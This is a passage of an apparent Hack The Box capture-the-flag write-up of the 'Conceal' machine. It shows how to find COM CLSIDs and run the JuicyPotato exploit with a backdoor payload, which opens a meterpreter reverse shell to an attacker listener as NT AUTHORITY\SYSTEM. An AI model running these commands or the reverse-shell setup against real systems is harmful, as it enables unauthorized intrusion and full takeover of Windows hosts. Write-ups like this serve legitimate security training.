C:\Windows\system32>cd c:\users\Administrator
cd c:\users\Administrator
c:\Users\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0DCA-A9F4
Directory of c:\Users\Administrator
12/10/2018 22:07 <DIR> .
12/10/2018 22:07 <DIR> ..
12/10/2018 19:17 <DIR> Contacts
17/03/2021 16:01 <DIR> Desktop
12/10/2018 19:17 <DIR> Documents
17/03/2021 16:01 <DIR> Downloads
12/10/2018 19:17 <DIR> Favorites
12/10/2018 19:17 <DIR> Links
12/10/2018 19:17 <DIR> Music
17/03/2021 15:10 <DIR> OneDrive
12/10/2018 19:17 <DIR> Pictures
12/10/2018 19:17 <DIR> Saved Games
12/10/2018 19:17 <DIR> Searches
12/10/2018 19:17 <DIR> Videos
0 File(s) 0 bytes
14 Dir(s) 9,699,082,240 bytes free
c:\Users\Administrator>cd Desktop
cd Desktop
c:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0DCA-A9F4
Directory of c:\Users\Administrator\Desktop
17/03/2021 16:01 <DIR> .
17/03/2021 16:01 <DIR> ..
12/10/2018 22:57 32 proof.txt
1 File(s) 32 bytes
2 Dir(s) 9,699,082,240 bytes free
How to get correct CLSID
There is not correct answer for this. However based on the operating system we can get from [here](juicy-potato/CLSID/Windows_10_Enterprise at master · ohpe/juicy-potato · GitHub) tray some CLSID randomly. Or some scripts allows to test these CLSID and can provide some results which may work. copy these files to Windows machine
Test script
CLSID list
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ head -5 CLSID.list 127 ⨯
{BA7C0D29-81CA-4901-B450-634E20BB8C34}
{8C334A55-DDB9-491c-817E-35A6B85D2ECB}
{A5065670-136D-4FD6-A45F-00C85B90359C}
{A5B020FD-E04B-4e67-B65A-E7DEED25B2CF}
{C0DCC3A6-BE26-4bad-9833-61DFACE1A8DB}
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ head -5 test_clsid.bat
@echo off
:: Starting port, you can change it
set /a port=10000
SETLOCAL ENABLEDELAYEDEXPANSION
Use some windows file transfer methods to transfer these files to windows.
Once transferred run the bat file look for some CLSID in result.log which is running as “NT Authority/SYSTEM”. Full results are uploaded here.
.\test_clsid.bat
{BA7C0D29-81CA-4901-B450-634E20BB8C34} 10000
{8C334A55-DDB9-491c-817E-35A6B85D2ECB} 10000
{A5065670-136D-4FD6-A45F-00C85B90359C} 10000
{A5B020FD-E04B-4e67-B65A-E7DEED25B2CF} 10000
{C0DCC3A6-BE26-4bad-9833-61DFACE1A8DB} 10000
{924DC564-16A6-42EB-929A-9A61FA7DA06F} 10000
{3631271D-DDD3-40f2-AC17-B13A3742BA62} 10000
{217700E0-2001-11DF-ADB9-F4CE462D9137} 10000
{3480A401-BDE9-4407-BC02-798A866AC051} 10000
Try the Juicypotato commands with some of the CLSID’s running as “NT Authority/SYSTEM”
Testing with One more CLSID than we tried earlier
Directory of C:\users\Destitute\Documents
04/03/2022 00:26 <DIR> .
04/03/2022 00:26 <DIR> ..
03/03/2022 01:00 7,168 backdoor.exe
03/03/2022 01:16 28,640 CLSID.list
03/03/2022 01:19 1,580 GetCLSID.ps1
03/03/2022 01:20 259 getclsidtest.ps1
03/03/2022 00:07 347,648 JuicyPotato.exe
03/03/2022 00:23 59,392 nc.exe
04/03/2022 00:42 4,657 result.log
09/03/2021 20:08 285 test_clsid.bat
8 File(s) 449,629 bytes
2 Dir(s) 9,719,095,296 bytes free
JuicyPotato.exe -t * -p backdoor.exe -l 5555 -c {d20a3293-3341-4ae8-9aaf-8e397cb63c34}
JuicyPotato.exe -t * -p backdoor.exe -l 5555 -c {d20a3293-3341-4ae8-9aaf-8e397cb63c34}
Testing {d20a3293-3341-4ae8-9aaf-8e397cb63c34} 5555
......
[+] authresult 0
{d20a3293-3341-4ae8-9aaf-8e397cb63c34};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
We got reverse shell
ayload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.12 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.12:5555
[*] Sending stage (200262 bytes) to 10.10.10.116
[*] Meterpreter session 2 opened (10.10.14.12:5555 -> 10.10.10.116:50774) at 2022-03-03 20:18:49 -0500
meterpreter > shell
Process 4920 created.
Channel 1 created.
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
Key-Learnings Link to heading
Always run an automatic scan apart from the manual scan we perform to make sure we are not wasting the time by exploiting the the non-vulnrable services. In this case 161 port was missing in my initial scan and the Autoreconf scan showed the 161 port.
Strongswan is used for buidling a IPSEC vPN tunnel from attack machine to htb machine based on enumerated parameters. The IPSEC VPN config parameters requires some mutltiple modification to make the parameters matching.
For Privilege escalation the juicypotato exploit is used. Refer more on here about Juicypotato.